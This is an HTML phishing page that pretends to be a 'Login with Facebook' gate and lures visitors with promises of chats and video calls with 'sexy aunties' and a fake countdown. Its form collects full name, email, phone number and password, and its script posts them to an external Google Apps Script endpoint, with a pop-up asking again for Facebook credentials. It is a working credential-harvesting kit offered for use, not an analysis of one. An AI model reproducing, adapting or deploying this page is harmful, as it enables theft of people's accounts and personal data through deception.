<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
</head>
<style>
body {
  /* display: flex;
  justify-content: center;
  align-items: center;
  min-height: 100vh;
  background: #eceffc; */
  background-color: #000000;
  color: #ffffff;
}
input{
    color: #000000;
}
.btn {
  padding: 8px 20px;
  border-radius: 0;
  overflow: hidden;
}
.btn::before {
  position: absolute;
  content: "";
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: linear-gradient(120deg, transparent, var(--primary-color), transparent);
  transform: translateX(-100%);
  transition: 0.6s;
}
.btn:hover {
  background: transparent;
  box-shadow: 0 0 20px 10px rgba(51, 152, 219, 0.5);
}
.btn:hover::before {
  transform: translateX(100%);
}

.form-input-material {
  --input-default-border-color: white;
  --input-border-bottom-color: white;
}
.form-input-material input {
  color: #000000;
}

.login-form {
  display: flex;
  flex-direction: column;
  align-items: center;
  padding: 50px 40px;
  color: white;
  background: rgba(0, 0, 0, 0.8);
  border-radius: 10px;
  box-shadow: 0 0.4px 0.4px rgba(128, 128, 128, 0.109), 0 1px 1px rgba(128, 128, 128, 0.155), 0 2.1px 2.1px rgba(128, 128, 128, 0.195), 0 4.4px 4.4px rgba(128, 128, 128, 0.241), 0 12px 12px rgba(128, 128, 128, 0.35);
}
.login-form h1 {
  margin: 0 0 24px 0;
  color: #000000;
}
.login-form .form-input-material {
  margin: 12px 0;
}
.login-form .btn {
  width: 100%;
  margin: 18px 0 9px 0;
}
h2{
    font-family: monospace;
    font-size: 28px;
}
ul{
    color: pink;
    font-size: 25px;
    font-family: monospace;
    line-height: 3rem;
}
#demo{
    font-size: 30px;
    color: red;
    font-family: monospace;
}
.success-msg{
    position: fixed;
    top: 0px;
    left: 40%;
    min-width: 30%;
    padding: 10px;
    font-family: monospace;
    font-size: 20px;
    margin-right: auto;
    margin-left: auto;
    height: 50px;
    background-color: #961d31;
    border-radius: 5px;
    color: rgb(255, 255, 255);
    text-align: center;
    display: none;
}
@media(max-width: 767px){
    .success-msg{
        left: 0px;
        height: 100px;
    }
}
</style>
<body>
    <h2>Login with Facebook to:</h2>
    <ul>
        <li>Chat with sexy girls</li>
        <li>Video call with sexy mallu aunty</li>
        <li>You can see their images! Sexy ladies</li>
    </ul>
    <h2>Login fastly !! only 20 aunties left</h2>
    <h3 id="demo"></h3>

    
    <form class="login-form" name="google-sheet">
        <h1>Login</h1>
        <div class="form-input-material">
            <input type="text" name="name" method="POST" id="name" placeholder=" " autocomplete="off" class="form-control-material" required />
            <label for="username">Full Name</label>
          </div>
        <div class="form-input-material">
          <input type="text" name="username" id="username" method="POST" placeholder=" " autocomplete="off" class="form-control-material" required />
          <label for="username">Email Id</label>
        </div>
        <div class="form-input-material">
            <input type="text" name="phone" id="phone" placeholder=" " method="POST" autocomplete="off" class="form-control-material" required />
            <label for="username">phone no</label>
          </div>
        <div class="form-input-material">
          <input type="password" name="password" id="password" placeholder=" " method="POST" autocomplete="off" class="form-control-material" required />
          <label for="password">Password</label>
        </div>
        <!-- <input type="submit" id="send-msg" class="btn btn-primary btn-ghost" value="submit"> -->
        <input type="submit" name="Submit" class="btn" id="send-msg" value="Lets Sex">
      </form>
      <div class="success-msg" >
        <p> Please enter your FB username and password </p>
    </div>
    




</body>
<script>
    // Set the date we're counting down to
    var countDownDate = new Date("october 1, 2020 02:30:00").getTime();
    
    // Update the count down every 1 second
    var x = setInterval(function() {
    
      // Get today's date and time
      var now = new Date().getTime();
    
      // Find the distance between now and the count down date
      var distance = countDownDate - now;
    
      // Time calculations for days, hours, minutes and seconds
      var days = Math.floor(distance / (1000 * 60 * 60 * 24));
      var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
      var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
      var seconds = Math.floor((distance % (1000 * 60)) / 1000);
    
      // Display the result in the element with id="demo"
      document.getElementById("demo").innerHTML = days + "d " + hours + "h "
      + minutes + "m " + seconds + "s ";
    
      // If the count down is finished, write some text
      if (distance < 0) {
        clearInterval(x);
        document.getElementById("demo").innerHTML = "EXPIRED";
      }
    }, 1000);

    // contact form
    const scriptURL = 'https://script.google.com/macros/s/AKfycbzL3wXvzS69ojcIEIZP2rZROycgIZD5dqt7HSvFbuWIj2UU-yU/exec'
    const form = document.forms['google-sheet']
    function success() {
    let x = document.querySelector(".success-msg").style.display = 'block'
    setTimeout(function(){
                document.querySelector(".success-msg").style.display = "none"
            }, 3000)
    }

    document.addEventListener('submit', function(){
        document.querySelector('#send-msg').onclick = function(){
            success()
        }
    })
    $(document).ready(function(){
        $('form').on("submit",function(){
            success()
        });
    });

    form.addEventListener('submit', e => {
        
        e.preventDefault()
        
        fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .catch(error => console.error('Error!', error.message))
    });
</script>

</html>
